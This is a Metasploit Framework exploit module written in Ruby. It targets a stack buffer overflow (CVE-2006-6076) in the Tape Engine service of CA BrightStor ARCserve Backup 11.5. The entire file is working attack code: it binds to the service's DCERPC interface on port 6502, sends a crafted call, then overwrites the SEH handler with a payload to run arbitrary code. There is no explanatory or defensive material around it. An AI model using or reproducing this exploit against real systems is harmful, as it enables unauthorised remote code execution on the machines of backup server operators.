##
# $Id: tape_engine.rb 4419 2007-02-18 00:10:39Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Brightstor::Tape_Engine < Msf::Exploit::Remote

	include Exploit::Remote::DCERPC
	include Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'CA BrightStor ARCserve Tape Engine Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Computer Associates BrightStor ARCserve Backup
				11.5. By sending a specially crafted DCERPC request, an attacker could overflow the
				buffer and execute arbitrary code. 
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 4419 $',
			'References'     =>
				[
					[ 'CVE', '2006-6076' ],
					[ 'BID', '21221' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'  =>
					[ 
						[ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5 } ],
					],	
			'DisclosureDate' => 'Nov 21 2006',
			'DefaultTarget' => 0))

			register_options([ Opt::RPORT(6502) ], self.class)	
	end

	def exploit
		connect
		
		handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
		print_status("Binding to #{handle} ...")

		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")

		request =  "\x00\x04\x08\x0c\x02\x00\x00\x00\x00\x00"
		request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

		dcerpc.call(43, request)
       
		filler = "\x10\x09\xf9\x77" + rand_text_english(1132)
		seh    = generate_seh_payload(target.ret)
		sploit = filler + seh

		print_status("Trying target #{target.name}...")
         
			begin
				dcerpc_call(38, sploit)
				rescue Rex::Proto::DCERPC::Exceptions::NoResponse
			end

		handler
		disconnect
	end

end
end	
